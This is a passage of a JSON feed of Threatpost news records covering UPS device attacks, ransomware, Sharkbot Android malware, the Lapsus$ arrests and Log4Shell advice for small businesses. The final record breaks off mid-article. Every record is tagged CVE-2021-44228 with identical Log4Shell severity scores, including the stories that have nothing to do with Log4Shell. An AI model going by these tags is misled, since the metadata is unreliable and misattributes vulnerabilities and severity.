(CISA) and the Department of Energy, which warned that malicious types are going after internet-connected versions of UPS via default usernames and passwords, mostly \u2013 though vulnerabilities, like the [TLStorm bugs disclosed earlier this month](<https://threatpost.com/zero-click-flaws-ups-critical-infratructure/178810/>) \u2013 are also in the attacker toolbox.\n\n\u201cIn recent years, UPS vendors have added an Internet of Things [IoT] capability, and UPSs are routinely attached to networks for power monitoring, routine maintenance and/or convenience,\u201d according to a [Tuesday alert](<https://www.cisa.gov/sites/default/files/publications/CISA-DOE_Insights-Mitigating_Vulnerabilities_Affecting_Uninterruptible_Power_Supply_Devices_Mar_29.pdf>) from CISA (PDF). \u201cLoads for UPSs can range from small (e.g., a few servers) to large (e.g., a building) to massive (e.g., a data center).\u201d\n\nIf attackers are able to remotely take over the devices, they can be used for a host of nefarious ends. For instance, bad actors can use them as a jumping-off point to breach a company\u2019s internal network and steal data. Or, in a grimmer scenario, they could be used to cut power for mission-critical appliances, equipment or services, which could cause physical injury in an industrial environment, or disrupt business services, leading to significant financial losses.\n\nFurther, cyberattackers could also execute remote code to alter the operation of the UPSs themselves, or physically damage them (or the devices connected to them).\n\n\u201cIt\u2019s easy to forget that every device connected to the internet is at increased risk of attack,\u201d Tim Erlin, vice president of strategy at Tripwire, noted via email. \u201cJust because a vendor provides the capability to put a device on the internet, doesn\u2019t mean that it\u2019s set up to be secure. It\u2019s up to each organization to ensure that the systems they deploy are configured securely.\u201d\n\n## **An Easy Fix**\n\nThus, those responsible for UPS upkeep (which CISA noted could include IT staff, building operations people, industrial maintenance workers or third-party contractors from monitoring services) have an easy fix for this one: Enumerating all connected UPSs and similar systems and simply take them offline.\n\nIf maintaining an active IoT connection is a requirement, admins should change the default credentials to a strong user-name-and-password combo \u2013 and preferably, implement multifactor authentication (MFA) too, CISA added. And other mitigations, according to CISA, include ensuring UPSs are behind a virtual private network (VPN), and adopting login timeout/lockout features so that the devices aren\u2019t continually online and open to the world.\n\n\u201cThe use of a default username and password to maliciously access a system isn\u2019t a new technique,\u201d said Erlin. \u201cIf you\u2019re responding to this advisory by updating the credentials for your UPS systems, take the follow-up step to ensure that other systems aren\u2019t using default credentials as well.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T17:14:57", "type": "threatpost", "title": "Cyberattackers Target UPS Back-Up Power Devices in Mission-Critical Environments", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-30T17:14:57", "id": "THREATPOST:16877B149E701CC4DB69E91C567D79CC", "href": "https://threatpost.com/cyberattackers-ups-backup-power-critical-environments/179169/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-10T14:12:32", "description": "You hate to blame the victim, but the fact of the matter is that businesses are just asking to get whacked with ransomware multiple times.\n\nA recent [study](<https://www.extrahop.com/company/press-releases/2022/cyber-confidence-index-2022/>) of IT leaders from cloud-native network detection and response firm ExtraHop shows that businesses aren\u2019t even aware of the \u201cattack me,\u201d \u201ceasy prey\u201d pheromones they\u2019re giving off: In fact, there\u2019s a yawning chasm between perception and reality.\n\nThe study shows that corporate leaders have a false sense of security when it comes to their organizations\u2019 IT security readiness. Their confidence is disconnected from their admittance that their cybersecurity incidents are a result of their own outdated IT security plans, including widespread use of insecure and deprecated protocols, as well as growing numbers of unmanaged devices.\n\n\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nThe reality: 69 percent of respondents acknowledged transmitting sensitive data over unencrypted HTTP connections instead of more secure HTTPS connections. Another 68 percent are still running SMBv1, the protocol exploited in major/ancient/still-exploited attacks like [WannaCry](<https://threatpost.com/wannacry-gandcrab-top-ransomware-scene/178589/>) and [NotPetya](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>), leading to more than $1 billion in damages worldwide.\n\nDenial ain\u2019t just a river in Egypt. The delusion is particularly dangerous, given the sky-high rate of ransomware attacks. In ExtraHop\u2019s Cyber Confidence Index 2022 \u2013 which surveyed 500 security and IT decision makers in the United States, United Kingdom, France and Germany \u2013 85 percent reported having suffered at least one ransomware attack, and 74 percent reported experiencing multiple incidents in the past five years.\n\n * A jarring majority have experienced a ransomware attack, with some being hit twice. What\u2019s more, the data shows that if a business is hit once, it\u2019s more likely to be hit again.\n * A number of IT decision makers haven\u2019t faced an attack \u2013 and so they \u201caren\u2019t concerned.\u201d\n * 77 percent of IT decision makers are very or extremely confident in their company\u2019s ability to prevent or mitigate cybersecurity threats. And yet \u2026\n * 64 percent admit that half or more of their cybersecurity incidents are the result of their own outdated IT security postures.\n * 85 percent reported having suffered at least one ransomware attack in the past five years, and 74 percent have experienced multiple attacks.\n * 48 percent of companies that suffered a ransomware attack said they paid the ransom demanded most or all of the time.\n\nJamie Moles, ExtraHop senior technical manager, dropped by the Threatpost podcast to talk about perceptions vs. reality.\n\nWannaCry, which hit a few years ago, is a prime example, he told us. The advice back then (and now) was that organizations should check their backups to make sure they\u2019re usable. Innumerable articles and blogs interrogated admins, asking, Have you actually restored a backup recently to make sure that your restores work? Are they up to date?\n\n\u201cA lot of people, we\u2019re finding, actually, that their backup procedures were good, but maybe the technology wasn\u2019t up to date or they were too reliant on things like [volume shadow copies](<https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service>) on workstations,\u201d Jamie told us. \u201cA restore when data was corrupted, not realizing that ransomware gangs turn off volume shadow copies on workstations.\n\n\u201cSo you can\u2019t restore from that. And a lot of organizations found that maybe their backups weren\u2019t fully up to date and they had to go too far back in time to restore, to get themselves operationally back to date. And this has an obvious impact in terms of operating. Resilience has a cost factor associated with it, and getting yourself back to where you were yesterday.\u201d\n\nSo\u2026not to imply anything, but hey, we just thought we\u2019d ask: Have you checked your backups lately to make sure they work?\n\nIf not, maybe go do that. We\u2019ll wait. This podcast doesn\u2019t have an expiration date.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/030722_ExtraHop_Jamie_Moles_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T14:00:32", "type": "threatpost", "title": "Multi-Ransomwared Victims Have It Coming\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T14:00:32", "id": "THREATPOST:02A472487653A461080415A3F7BB23D2", "href": "https://threatpost.com/blaming-ransomware-victims-podcast/178799/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-08T16:20:58", "description": "Researchers have found the info-stealing Android malware Sharkbot lurking unsuspected in the depths of the Google Play store under the cover of anti-virus (AV) solutions.\n\nWhile analyzing suspicious applications on the store, the Check Point Research (CPR) team found what purported to be genuine AV solutions downloading and installing the malware, which steals credentials and banking info from Android devices but also has a range of other unique features.\n\n\u201cSharkbot lures victims to enter their credentials in windows that mimic benign credential input forms,\u201d CPR researchers Alex Shamsur and Raman Ladutska wrote in a [report](<https://research.checkpoint.com/2022/google-is-on-guard-sharks-shall-not-pass/>) published Thursday. \u201cWhen the user enters credentials in these windows, the compromised data is sent to a malicious server.\u201d\n\nResearchers discovered six different applications\u2014including ones named Atom Clean-Booster, Antivirus; Antvirus Super Cleaner; and Center Security-Antivirus\u2014spreading Sharkbot. The apps came from three developer accounts\u2013Zbynek Adamcik, Adelmio Pagnotto and Bingo Like Inc.\u2014at least two of which were active in the autumn of last year. The timeline makes sense, as Sharkbot [first came onto researchers\u2019](<https://blog.malwarebytes.com/trojans/2021/11/sharkbot-android-banking-trojan-cleans-users-out/>) radar screens in November.\n\n\u201cSome of the applications linked to these accounts were removed from Google Play, but still exist in unofficial markets,\u201d researchers wrote. \u201cThis could mean that the actor behind the applications is trying to stay under the radar while still involved in malicious activity.\u201d\n\nGoogle removed the offending applications, but not before they were downloaded and installed about 15,000 times, researchers said. Primary targets of Sharkbot are users in the United Kingdom and Italy, as was previously the case, they said.\n\n## **Unique Aspects**\n\nCPR researchers peered under the hood of Sharkbot and uncovered not only typical info-stealing tactics, but also some characteristics that set it apart from typical Android malware, researchers said. It includes a geofencing feature that selects users based on geographic areas, ignoring users from China, India, Romania, Russia, Ukraine or Belarus, they said.\n\nSharkbot also boasts some clever techniques, researchers noted. \u201cIf the malware detects it is running in a sandbox, it stops the execution and quits,\u201d they wrote.\n\nAnother unique hallmark of the malware is that it makes use of Domain Generation Algorithm (DGA), an aspect rarely used in malware for the Android platform, researchers said.\n\n\u201cWith DGA, one sample with a hardcoded seed generates seven domains per week,\u201d they wrote. \u201cIncluding all the seeds and algorithms we have observed, there is a total of 56 domains per week, i.e., 8 different combinations of seed/algorithm.\u201d\n\nResearchers observed 27 versions of Sharkbot in their research; the main difference between versions was different DGA seeds as well as different botnetID and ownerID fields, they said.\n\nAll in all, Sharkbot implements 22 commands that allow various malicious actions to be executed on a user\u2019s Android device, including: requesting permission for sending SMS messages; uninstalling a given applications; sending the device\u2019s contact list to a server; disabling battery optimization so Sharkbot can run in the background; and imitating the user\u2019s swipe over the screen.\n\n## **Timeline of Activity**\n\nResearchers first discovered four applications of the Sharkbot Dropper on Google Play on Feb. 25 and shortly thereafter reported their findings to Google on March 3. Google removed the applications on March 9 but then another Sharkbot dropper was discovered six days later, on March 15.\n\nCPR reported the third dropper discovered immediately and then found two more Sharkbot droppers on March 22 and March 27 that they also reported quickly to Google for removal.\n\nThe droppers by which Sharkbot spreads in and of themselves should raise concern, researchers said. \u201cAs we can judge by the functionality of the droppers, their possibilities clearly pose a threat by themselves, beyond just dropping the malware,\u201d they wrote in the report.\n\nSpecifically, researchers found the Sharkbot dropper masquerading as the following applications on Google Play;\n\n * com.abbondioendrizzi.tools[.]supercleaner\n * com.abbondioendrizzi.antivirus.supercleaner\n * com.pagnotto28.sellsourcecode.alpha\n * com.pagnotto28.sellsourcecode.supercleaner\n * com.antivirus.centersecurity.freeforall\n * com.centersecurity.android.cleaner\n\nThe droppers also have a few of their own evasion tactics, such as detecting emulators and quitting if one is found, researchers noted. They also are able to inspect and act on all the UI events of the device as well as replace notifications sent by other applications.\n\n\u201cIn addition, they can install an APK downloaded from the CnC, which provides a convenient starting point to spread the malware as soon as the user installs such an application on the device,\u201d researchers added.\n\n## **Google Play Under Fire**\n\nGoogle has [long struggled](<https://threatpost.com/google-play-malware-spy-trojans/164601/>) with the persistence of malicious applications and [malware](<https://threatpost.com/teabot-trojan-haunts-google-play-store/178738/>) on its Android app store and has made significant efforts to clean up its act.\n\nHowever, the emergence of Sharkbot disguised as AV solutions shows that attackers are getting sneakier in how they hide their malicious activity on the platform, and could serve to damage users\u2019 confidence in Google Play, noted a security professional.\n\n\u201cMalware apps that conceal their malicious functionality with time delays, code obfuscation and geofencing can be challenging to detect during the app review process, but the regularity that they are discovered lurking in official app stores really damages user trust in the safety of all apps on the platform,\u201d observed Chris Clements, vice president of solutions architecture at security firm [Cerberus Sentinel](<https://www.cerberussentinel.com/>), in an email to Threatpost**.**\n\nWith the smartphone at the center of people\u2019s digital lives and actins as a hub of financial, personal and work activity, \u201cany malware that compromises the security of such a central device can do significant financial or reputational damage,\u201d he added.\n\nAnother security professional urged caution to Android users when deciding whether or not to download a mobile app from a reputable vendor\u2019s store, even if it\u2019s a trusted brand.\n\n\u201cWhen installing apps from various technology stores, it is best to research the app before downloading it,\u201d observed James McQuiggan, security awareness advocate at [KnowBe4](<http://www.knowbe4.com/>). **\u201c**Cybercriminals love to trick users into installing malicious apps with hidden functionalities in an attempt to steal data or take over accounts.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-08T16:06:29", "type": "threatpost", "title": "Google Play Bitten by Sharkbot Info-stealer \u2018AV Solution\u2019", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-08T16:06:29", "id": "THREATPOST:48A631F2D45804C677BB672F838F29DA", "href": "https://threatpost.com/google-play-bitten-sharkbot/179252/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T21:25:13", "description": "City of London Police have arrested seven people suspected of being connected to the Lapsus$ gang.\n\nThe bust came within hours of Bloomberg having published a [report](<https://www.bloomberg.com/news/articles/2022-03-23/teen-suspected-by-cyber-researchers-of-being-lapsus-mastermind?sref=ylv224K8>) about a teenage boy living at his mother\u2019s house near Oxford, England who\u2019s suspected of being the Lapsus$ mastermind.\n\nThe police haven\u2019t verified whether or not they nabbed the Oxford teen, per se.\n\nAt any rate, given that he\u2019s a minor, it would be illegal to identify him: According to security journalist [Brian Krebs](<https://krebsonsecurity.com/2022/03/a-closer-look-at-the-lapsus-data-extortion-group/>), the teen is 17, though the [BBC](<https://www.bbc.com/news/technology-60864283>) pegs his age at 16.\n\nBut for what it\u2019s worth, all of the suspects are young. In a statement given to [TechCrunch](<https://techcrunch.com/2022/03/24/london-police-lapsus-arrests/>), the City of London Police said the seven are between 16 and 21: \u201cThe City of London Police has been conducting an investigation with its partners into members of a hacking group,\u201d according to Detective Inspector Michael O\u2019Sullivan. \u201cSeven people between the ages of 16 and 21 have been arrested in connection with this investigation and have all been released under investigation. Our enquiries remain ongoing.\u201d\n\nInvestigators reportedly told Bloomberg that another member of Lapsus$ is suspected to be a teenager residing in Brazil. There could well be more: Another investigator told the outlet that security researchers have identified seven unique accounts associated with Lapsus$, \u201cindicating that there are likely others involved in the group\u2019s operations.\u201d\n\n## Busy Beavers\n\nOver the past few months, Lapsus$ \u2013 a data extortion group \u2013 has targeted [Brazil\u2019s Ministry of Health](<https://www.zdnet.com/article/brazilian-ministry-of-health-suffers-cyberattack-and-covid-19-vaccination-data-vanishes/>) and the gaming giant [Ubisoft](<https://www.toolbox.com/it-security/security-general/news/lapsus-ubisoft-security-incident/>), [crippled](<https://threatpost.com/portuguese-media-giant-impresa-ransomware/177323/>) the Portuguese media kingpin Impresa, and, in recent weeks, eviscerated tech giants including [Samsung](<https://threatpost.com/samsung-lapsus-ransomware-source-code/178791/>), [Nvidia](<https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/>), [Microsoft](<https://threatpost.com/microsoft-lapsus-compromised-one-employees-account/179048/>) and [Okta](<https://threatpost.com/lapsus-data-kidnappers-claim-snatches-from-microsoft-okta/179041/>).\n\nAllison Nixon**,** chief research officer at [Unit 221B](<https://www.unit221b.com/>), is one of the researchers who\u2019ve been tracking the Oxford teen, who, researchers say, goes by the online aliases \u201cWhite,\u201d \u201cBreachbase\u201d or \u201cOklaqq,\u201d among other names\n\nShe\u2019s been working with researchers at security firm Palo Alto Networks to track individual members of LAPSUS$ even prior to the group\u2019s formation. Nixon told KrebsOnSecurity that she\u2019s convinced that the White/OklAGG individual is the head honcho, given that, among other things, theidentity has been tied to the Lapsus$ group\u2019s recruiting message for company insiders to help them penetrate targeted organizations.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/23105813/lapsus-recruitment-ad-e1648047507406.png>)\n\nThe Lapsus$ gang\u2019s recruitment ad for rogue employees.\n\nNixon told the BBC that researchers have had the Oxford teen\u2019s name since the middle of last year and that they\u2019d identified him even before he was doxed by a hacking forum \u2013 Doxbin, a site where people can post or sift through the personal data of hundreds of thousands of people for the purpose of doxing \u2013that he\u2019d allegedly purchased and then run as a lousy, much-complained-about admin.\n\nHe wound up selling the forum back to its previous owner, at a loss, then leaked the entire Doxbin dataset, leading to the Doxbin community turning around and doxing him right back. That included what Krebs reported as \u201cvideos supposedly shot at night outside his home in the United Kingdom,\u201d along with his name, address, and social media pictures.\n\nThe Doxbin community also posted a curriculum vitae of his hacking career, the BBC reported \u2013 a career that made him filthy rich in short order. His Doxbin entry connected him to Lapsus$, as well. The entry reportedly reads:\n\n> \u201c[He] slowly began making money to further expand his exploit collection. \u2026 After a few years his net worth accumulated to well over 300BTC (close to $14 mil). \u2026 [He] now is affiliated with a wannabe ransomware group known as \u2018Lapsus$\u2019, who has been extorting &amp; \u2018hacking\u2019 several organisations.\u201d \u2014Doxbin entry, per the BBC\n\nNixon told the BBC that Unit 221B, working with Palo Alto, identified the threat actor and then watched his exploits throughout 2021, \u201cperiodically sending law enforcement a heads-up about the latest crimes.\u201d\n\nShe said that researchers tracked him by \u201cwatching the post history of an account and seeing older posts provide contact information for the guy.\u201d The \u201cWhite\u201d individual also helped, she said, by failing to cover his tracks.\n\n## Get Off My Code, You Damn Kids\n\nAfter its breaches, Lapsus$ has posted stolen source code on the group\u2019s Telegram channel, including code stolen from Microsoft\u2019s Azure DevOps server for the company\u2019s Bing and Cortana products. Lapsus$ has also posted screenshots of Okta\u2019s Slack channels and the interface for Cloudflare, which is one of thousands of customers that use Okta\u2019s technology to provide authentication for its employees.\n\nIn February, the group also [stole](<https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/>) two of Nvidia\u2019s code-signing certificates \u2013 certificates that were then used to sign malware, enabling malicious programs to slide past security safeguards on Windows machines.\n\nAfter its headline-grabbing attacks on Microsoft and Okta this past weekend, Lapsus$ announced on Tuesday that it was going to take a bit of a breather.\n\n\u201cA few of our members has a vacation until 30/3/2022. We might be quiet for some times,\u201d the hackers wrote in the group\u2019s Telegram channel. \u201cThanks for understand us. \u2013 we will try to leak stuff ASAP.\u201d\n\n## Why\u2019d You Do It?\n\nKen Westin, director of security strategy at Cybereason, said it\u2019s tough to guess at the motivation of the purported \u201cmastermind\u201d teen. \u201cMany had speculated it was an organized cybercrime syndicate or potential nation state actors,\u201d he told Threatpost in an email on Thursday.\n\nWhatever the teen\u2019s motivation \u2013 he\u2019s described as having autism, for whatever that\u2019s worth \u2013 Westin thinks the security community underestimates the younger generation. \u201cWe forget teens today have not only grown up with computers, but also have access to an unprecedented number of educational resources on programming and offensive security,\u201d he said.\n\n\u201cI speculated the group was young based on their modus operandi, or lack thereof, it was as if they were surprised by their success and were not sure what to do with it. In some of their follow up communications their language appeared more interested in the notoriety and [was] defensive of their capabilities and accomplishments than any financial motivation,\u201d he continued.\n\nOf course, when it comes to guessing what somebody\u2019s motivation might be for taking on the world\u2019s shiniest tech companies, et al., there\u2019s always that purported 300BTC income that Doxbin pointed to. Not too shabby a motivation, that, particularly when planted in the still-developing brain of a tot that\u2019s been put under glass during the pandemic.\n\n\u201cToday, teens have seen how much money is being made in criminal hacking, in some ways they are the new rockstars,\u201d Westin said. \u201cYou pair this with the fact kids have been couped up for three years often with nothing but the internet to entertain themselves and we shouldn\u2019t be surprised we have skilled hackers. The problem is that their brains are still developing and the line between fun and crime can get blurred, where it\u2019s common for kids to hack to gain notoriety amongst their peers, but this easily crosses over into decisions that can affect the rest of their lives.\u201d\n\nIt\u2019s too early to say whether this will be the end of Lapsus$, he said. \u201cit could still be a false flag, bad attribution, or even framing someone for the hacks. If it is this 16-year-old in England, it is likely we will see an end to the group\u2019s activity, unless one of their partners in cybercrime takes up the mantle.\u201d\n\nWhether Lapsus$ boils down to a criminal gang or a teenager from Oxford, what matters is that the \u201corganization\u201d clearly has the ability to infiltrate some of the world\u2019s largest organizations at a speed that makes these attacks impossible to prevent using traditional perimeter defense tools, said Darren Williams, founder and CEO of privacy/security/prevention firm BlackFog.\n\nWe can\u2019t stick all teenagers in suspended animation until their brains are fully formed, but we can take note of how these groups/individuals stick it to targeted organizations. In an email to Threatpost on Thursday, Williams noted that more than 84 percent of all attacks involve data exfiltration, exposing data on the Dark Web and/or public web sites.\n\n\u201cBy refocusing security efforts on anti-data exfiltration, organizations are able to mitigate extortion attempts, regulatory fines, reports and ultimately the loss of trust in the business,\u201d Williams suggested.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T21:23:30", "type": "threatpost", "title": "UK Cops Collar 7 Suspected Lapsus$ Gang Members", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T21:23:30", "id": "THREATPOST:8105FA1422BB4E02CD95C23CC7405E26", "href": "https://threatpost.com/uk-cops-collar-7-suspected-lapsus-gang-members/179098/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T20:32:17", "description": "News of the Log4Shell vulnerability is everywhere, with security experts variously calling the Apache log4j logging library bug a recipe for an \u201cinternet meltdown,\u201d as well as the \u201cworst cybersecurity bug of the year.\u201d Names like \u201cApple,\u201d \u201cTwitter\u201d and \u201cCloudflare\u201d are being bandied about as being vulnerable, but what does the issue mean for small- and medium-sized businesses?\n\nWe asked security experts to weigh in on the specific effects (and advice/remedies) for SMBs in a set of roundtable questions, aimed at demystifying the firehose of information around the headline-grabbing issue.\n\nIt may seem overwhelming for smaller companies. But our experts, from Anchore, Cybereason, Datto, ESET, HackerOne, Invicti Security, Lacework and Mitiga, have weighed in here with exclusive, practical advice and explanations specifically for SMBs dealing with Log4Shell.\n\n_\u201cWiz research shows that more than 89 percent of all environments have vulnerable log4j libraries. And in many of them, the dev teams are sure they have zero exposure \u2014 and are surprised to find out that some third-party component is actually built using Java.\u201d \u2014 Ami Luttwak, __co-founder and CTO at Wiz, which has seen its usage double as a result of Log4Shell (via email to Threatpo__st)._\n\n_**Questions answered (click to jump to the appropriate section):**_\n\n * What bad Log4Shell outcomes are possible for SMBs?\n * How is a real-world Log4Shell attack carried out?\n * How can SMBs prepare for Log4Shell without a dedicated security team?\n * What happens if an SMB uses an MSP?\n * What applications should SMBs worry about being attacked?\n * How can SMBs remediate a Log4Shell attack?\n * Final thoughts\n\n## Background on Log4Shell\n\nLog4Shell ([CVE-2021-44228](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>)) affects applications that rely on the log4j library to log data. Because that library is almost ubiquitous in Java applications, virtually any business that has a website is highly likely to be affected. With one line of malicious code, attackers are able to execute malware or commands on a target application and take over the server that houses it.\n\nFrom there, an attacker can carry out any number of further attacks.\n\n\u201cSmall businesses are at significant risk because plenty of the software they rely on may be vulnerable, and they do not have the resources to patch quickly enough,\u201d Ofer Maor, Mitiga CTO, told Threatpost.\n\nSMBs also tend to rely on third-party software suppliers and managed service providers (MSPs) for their technology infrastructure, which reduces cost and reduces the need for dedicated IT staff. However, this unfortunately puts SMBs at even worse risk, because they need to rely on their third-party vendors to patch and respond in many cases.\n\nThe bug was first disclosed as a zero-day vulnerability last week, but an emergency fix has been rolled out that now must be incorporated by the many developers who use log4j in their applications. The steps to address Log4Shell for SMBs thus include identifying potentially affected applications (including those provided by MSPs), confirming the vulnerability\u2019s impact within them, and applying or confirming updates as soon as possible. SMBs will also need to determine whether they\u2019re already compromised and remediate the issue if so.\n\nAll of this should take priority since [a slew of attacks is imminent](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>), thanks to an exploit becoming publicly available online, researchers noted.\n\n\u201cNumerous attack groups are already [actively exploiting](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) this vulnerability, mostly through automated scripts,\u201d Maor warned. \u201cThis means we expect to see this being exploited in masses, hitting tens of thousands or even more targets.\u201d\n\n## What Bad Log4Shell Outcomes Are Possible for SMBs?\n\n**Ofer Maor, Mitiga CTO:** One of the concerns is that a lot of these attacks now will focus on getting initial access only and establishing persistence (that is, installing something that will allow the attacker to have access to their systems later, even after the vulnerability has been fixed).\n\n**Marc-\u00c9tienne L\u00e9veill\u00e9, malware researcher for ESET:** SMBs providing online services may expose their system to malware and data exfiltration if their systems use the log4j software to log events. The risk is quite high, given the exploit is available online and relatively easy to trigger. Once into the network, cybercriminals could pivot to gain access to additional resources.\n\n**Josh Bressers, vice president of security at Anchore:** This vulnerability allows attackers to run the code of their choosing, such as a cryptominer, a backdoor or data-stealing malware, for example. One of the challenges for a vulnerability like this is the attacker landscape is changing rapidly. So far, most of the attacks seem to be using compute resources to mine cryptocurrency, but these attacks are changing and evolving each hour. It is expected that the attacks will gain in sophistication over the coming days and weeks.\n\n**Mark Nunnikhoven, distinguished cloud strategist at Lacework:** Unfortunately\u2026an attacker can take over your system or steal your data quite easily using this vulnerability.\n\n**Pieter Ockers, senior director of technical services at HackerOne: **In a more devastating case, criminals that gain initial access to the victim\u2019s environment could auction that access off to crews that specialize in executing ransomware attacks. SMBs should be hyper-aware of any of their software vendors/MSPs that use Apache log4j in case they are affected by a breach; I suspect we might hear of some ransomware attacks soon stemming from this vulnerability.\n\n## How Is a Real-World Log4Shell Attack Carried Out?\n\n**Cybereason CTO Yonatan Striem-Amit**: The most prevalent attack scenarios we\u2019ve seen are abusing things like the user agent or things like a log-in screen. If an application has a log-in page where a user is asked to put his username and password (and a lot of them do), an attacker could just supply the malicious string within that user field and get code execution on that server. After that he essentially controls logins, and therefore can start doing whatever he wants on that server, including, of course, eavesdropping into every other user who\u2019s logging in to the environment with their password.\n\n**Adam Goodman, vice president of 